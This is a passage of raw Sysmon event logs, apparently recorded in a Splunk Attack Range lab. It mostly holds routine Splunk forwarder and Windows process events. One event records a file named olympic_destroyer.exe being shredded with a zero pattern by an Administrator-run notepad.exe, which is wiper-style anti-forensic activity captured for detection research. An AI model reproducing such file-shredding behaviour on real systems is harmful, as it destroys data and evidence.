Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9B28749F40B3F06BD5450DCEFAA94B4,SHA256=2722DF06A8A57C57B6773DEC3D5D93C102B2C8771C9920D171FF5CB25E6670E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:50.107{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ACEE8E5BEF7D7445D195B5DB231ECF7,SHA256=F43C010B23A3E26042077B038779FBAEF4B058CFD15336004197368A2CBFFAC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:50.093{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7620E02508F9CDFCFF4A0B693FF418B,SHA256=88E6536382DEE483EA96351C21FBA823C6408063AC3E2BAF04305899C980740C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6667298E1091D110A8126E63D354E63A,SHA256=D7DC9079D68392F9F6E4B5F166BAF3976D1937869B2A8301C3AA1F95ECD45F7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:49.576{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49473-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:51.118{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87EBD2E4E75A49E8829281F7EC7923C0,SHA256=54944CFC6FB7C85E40E44A860B58245778DDDA71F2BCBC8BDBE586548EC8094A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17DF-6216-1C05-000000003902}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-17DF-6216-1C05-000000003902}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.249{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17DF-6216-1C05-000000003902}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.250{4F8D34B0-17DF-6216-1C05-000000003902}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:52.640{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05F33B3DB75B1CBAC048FE5C4E5776D4,SHA256=17094A6691DC970699E511B8F66EC36EB8AD6B806C3EE0B49B53A3A1FF42755D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:52.141{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CEFBC316AE744EA31A443C99AE6D998,SHA256=11E622D8B739B2E712FEBEE20786090EDA2452C592BCEDB75FF1DE51C5C27DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:52.249{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=345BCB470C64170F4B827ADB8BBB42C1,SHA256=647D2412CB6C86B8CEFB3D5D311FDE1DDA870796458F833517B7A42B6FFEAC9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:53.733{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC98185880DD52BDAA5DE88A2C0ADA4C,SHA256=1D397E7A26F92DB3E306EF4854FF3E1DAD8DBC22D91B3D1C0874F5AF3FF8BF14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:53.876{C8EA50B7-1778-6216-2B07-000000003802}6808ATTACKRANGE\AdministratorC:\Windows\SysWOW64\notepad.exeC:\Temp\olympic_destroyer.exeMD5=9BD61DF5A077C43CAD513F1BB44B94EF,SHA256=CF572E9E426298C78939909965FEF58C4F0C23756CEAE321965EF49DA93D6668,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x8000000000000000297707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:53.161{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75F4021DDDF4DB1E4DAE788670464EC2,SHA256=C6E1D34A2FA73E5C9CD93CB988A42552079388A8A498CCDBD7074E3BFA2F9C3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:54.796{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=005E48BE4E93FE6C21014605107DBA69,SHA256=6CCDBFBABBF2891CA9062A58A441CF869F9C80AC02E2102ED80F542C9F874AE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:54.179{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB9A2192881542EFD4EBF6ABE79A216D,SHA256=1DAC824C7773F4BFC52DC05D355495737F8F43D2F55229CF9FA20CED0E78ABAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:51.591{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51660-false10.0.1.12-8000- 23542300x8000000000000000221621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:55.858{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBF62FEFC165D8124A1B0655DB83EA81,SHA256=848013D456D1D356FE3E0F1DC5ECEF61E6244D04BB56A77D6FCC19408CE51D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:55.193{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C23498248EC70A9242F50419CC95A0E1,SHA256=22F5B1D67AE4D13BAF14BCC2DF854A168D47B101041B6528D24C1B89BAA0A808,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:56.928{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-160MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:56.243{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=909EA200C27C0A416DD5E95E9DB63DB4,SHA256=94A6B8C8042D1E0E9B118EBB1C3531C59E8BC78CD14B69AE598F583DD0569737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:57.941{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-161MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:55.566{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49474-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:57.261{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B09AFC24B972944FA419A842C05CFC,SHA256=6EE782A63E43C412467ACF94A7D4191D3AFDE7C2BD7B3DE216940B0F4A9500B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:57.093{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=026313CB941635660B24078B09BAE9B3,SHA256=100BDE56FEB91783D0A6C7F8F78F3197EFE2A4FA90D20AD7C2F81A5C66B95C22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:58.292{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20027035E68563A1CB2DCFAF4475EF10,SHA256=F8D9DA1108850F7AD18A46C7DA6973E0456FAD18225112CDFE7D4AB32AC3E8BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:56.622{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51661-false10.0.1.12-8000- 23542300x8000000000000000221623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:58.249{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9421F28653D54D045DF956380130B358,SHA256=16B47197445833C371CCF0B6D15D8696E64042F582EB94DD91D0FB65CD33A161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 